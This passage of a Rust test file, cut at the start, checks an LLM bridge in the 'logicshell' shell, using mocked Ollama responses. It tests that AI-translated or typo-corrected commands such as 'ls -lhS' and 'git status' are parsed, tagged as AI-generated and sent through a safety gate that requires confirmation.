        "safe AI command must be Confirm, not auto-allowed; score={}",
        assessment.score
    );
}

// Exit-127 assist path: a corrected command goes through the same safety gate.
#[tokio::test]
async fn assist_127_then_safety_eval_confirms_corrected_cmd() {
    let bridge = LlmBridge::new(StubClient::new("git push origin main"), "llama3", 8_000);
    let proposed = bridge.assist_on_127(&["gitt", "push"]).await.unwrap();

    let (_, decision) = proposed.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default());
    // "git push" is medium risk at most; AI floor ensures at least Confirm.
    // NOTE(review): this only asserts "not Allow" — if Decision has exactly
    // Allow/Confirm/Deny, assert_ne!(decision, Decision::Allow) would say the
    // same thing more directly; confirm the variant set before tightening.
    assert!(
        decision == Decision::Confirm || decision == Decision::Deny,
        "AI corrected command must be Confirm or Deny, got {decision:?}"
    );
}

// ── Phase 10 OllamaLlmClient integration (requires `ollama` feature) ─────────

#[cfg(feature = "ollama")]
mod ollama_bridge_tests {
    use super::*;
    use logicshell_llm::ollama::OllamaLlmClient;
    use mockito::Matcher;

    // Minimal well-formed /api/generate success payload for the mock server.
    fn generate_ok_body(model: &str, response: &str) -> String {
        format!(r#"{{"model":"{model}","response":"{response}","done":true}}"#)
    }

    // NL translation over HTTP: the model's text is parsed into argv and the
    // result is tagged as AI-generated.
    #[tokio::test]
    async fn bridge_translate_nl_via_ollama_mock() {
        let mut server = mockito::Server::new_async().await;
        let _mock = server
            .mock("POST", "/api/generate")
            .with_status(200)
            .with_header("content-type", "application/json")
            .with_body(generate_ok_body("llama3", "ls -lhS"))
            .create_async()
            .await;

        let client = Arc::new(OllamaLlmClient::new(server.url(), "llama3", 30));
        let bridge = LlmBridge::new(client, "llama3", 8_000);
        let proposed = bridge
            .translate_nl("list files sorted by size")
            .await
            .unwrap();
        assert_eq!(proposed.argv, vec!["ls", "-lhS"]);
        assert_eq!(proposed.source, CommandSource::AiGenerated);
    }

    // Typo correction via the mock daemon.
    #[tokio::test]
    async fn bridge_assist_on_127_via_ollama_mock() {
        let mut server = mockito::Server::new_async().await;
        let _mock = server
            .mock("POST", "/api/generate")
            .with_status(200)
            .with_header("content-type", "application/json")
            .with_body(generate_ok_body("llama3", "git status"))
            .create_async()
            .await;

        let client = Arc::new(OllamaLlmClient::new(server.url(), "llama3", 30));
        let bridge = LlmBridge::new(client, "llama3", 8_000);
        let proposed = bridge.assist_on_127(&["gti", "status"]).await.unwrap();
        assert_eq!(proposed.argv, vec!["git", "status"]);
    }

    // Daemon-side failures surface as LlmError::Http rather than panicking.
    #[tokio::test]
    async fn bridge_translate_nl_503_propagates_http_error() {
        let mut server = mockito::Server::new_async().await;
        let _mock = server
            .mock("POST", "/api/generate")
            .with_status(503)
            .create_async()
            .await;

        let client = Arc::new(OllamaLlmClient::new(server.url(), "llama3", 30));
        let bridge = LlmBridge::new(client, "llama3", 8_000);
        let result = bridge.translate_nl("list files").await;
        assert!(matches!(result, Err(LlmError::Http(_))));
    }

    // Request-shape check: the client must POST JSON with "stream": false.
    // NOTE(review): despite the test name, only the stream flag is matched —
    // the prompt text itself is not asserted. Consider also matching the
    // prompt field once the request schema is pinned down.
    #[tokio::test]
    async fn bridge_translate_nl_sends_prompt_in_body() {
        let mut server = mockito::Server::new_async().await;
        let mock = server
            .mock("POST", "/api/generate")
            .match_body(Matcher::PartialJsonString(
                r#"{"stream":false}"#.to_string(),
            ))
            .with_status(200)
            .with_header("content-type", "application/json")
            .with_body(generate_ok_body("llama3", "pwd"))
            .create_async()
            .await;

        let client = Arc::new(OllamaLlmClient::new(server.url(), "llama3", 30));
        let bridge = LlmBridge::new(client, "llama3", 8_000);
        let _ = bridge.translate_nl("print current directory").await;
        mock.assert_async().await;
    }

    // Full pipeline through the mock daemon, ending at the safety evaluation.
    #[tokio::test]
    async fn bridge_full_pipeline_with_safety_eval_ollama() {
        let mut server = mockito::Server::new_async().await;
        let _mock = server
            .mock("POST", "/api/generate")
            .with_status(200)
            .with_header("content-type", "application/json")
            .with_body(generate_ok_body("llama3", "ls -la"))
            .create_async()
            .await;

        let client = Arc::new(OllamaLlmClient::new(server.url(), "llama3", 30));
        let bridge = LlmBridge::new(client, "llama3", 8_000);
        let proposed = bridge.translate_nl("list files").await.unwrap();

        let (_, decision) =
            proposed.evaluate_safety(SafetyMode::Balanced, &SafetyConfig::default());
        assert_eq!(
            decision,
            Decision::Confirm,
            "AI-generated command must require confirmation"
        );
    }

    // from_config also accepts the real Ollama client type (not just stubs).
    #[tokio::test]
    async fn bridge_from_config_with_ollama_client() {
        let mut server = mockito::Server::new_async().await;
        let _mock = server
            .mock("POST", "/api/generate")
            .with_status(200)
            .with_header("content-type", "application/json")
            .with_body(generate_ok_body("llama3", "ps aux"))
            .create_async()
            .await;

        let client = Arc::new(OllamaLlmClient::new(server.url(), "llama3", 30));
        let cfg = LlmConfig {
            enabled: true,
            model: Some("llama3".into()),
            ..LlmConfig::default()
        };
        let bridge = LlmBridge::from_config(client, &cfg).unwrap();
        let proposed = bridge.translate_nl("show running processes").await.unwrap();
        assert_eq!(proposed.argv[0], "ps");
    }

    // Smoke test against a real daemon; opt-in via `cargo test -- --ignored`.
    #[tokio::test]
    #[ignore = "requires live Ollama daemon at http://127.0.0.1:11434"]
    async fn live_translate_nl_with_real_daemon() {
        let client = Arc::new(OllamaLlmClient::new("http://127.0.0.1:11434", "llama3", 60));
        let bridge = LlmBridge::new(client, "llama3", 8_000);
        let result = bridge
            .translate_nl("list files in the current directory")
            .await;
        println!("live result: {result:?}");
        // Don't assert on the specific command — model output is non-deterministic.
        assert!(
            result.is_ok(),
            "live translate_nl should not error: {result:?}"
        );
    }
}